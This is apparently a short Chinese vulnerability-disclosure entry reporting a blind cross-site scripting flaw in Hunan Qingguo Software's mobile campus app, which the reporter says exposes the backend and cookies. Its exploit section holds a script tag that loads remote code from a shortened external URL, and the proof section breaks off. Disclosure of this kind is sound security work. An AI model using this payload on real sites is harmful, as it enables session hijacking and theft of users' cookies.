青果软件手机APP掌上校园某处XSS盲打以打到后台和cookies

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 提交的没通过,说是要完整的问题复现也是醉了。。。。。在提交一次 ### 详细说明: 漏洞利用代码: ``` <script src=http://t.cn/RUUNjzh></script> ``` [<img src="https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png" alt="IC_E5%SEZU3{PLSB@ET39RO.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png) 这是同IP的网站的确隶属于湖南青果软件有限公司: [<img src="https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png" alt="3Q)YC4SLH43EZYSC@E)7X$P.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png) [<img src="https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png" alt="XKO@WZG_4RPOYC`JHLFDYV9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png) ### 漏洞证明: ``` 漏洞证明 ``` [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息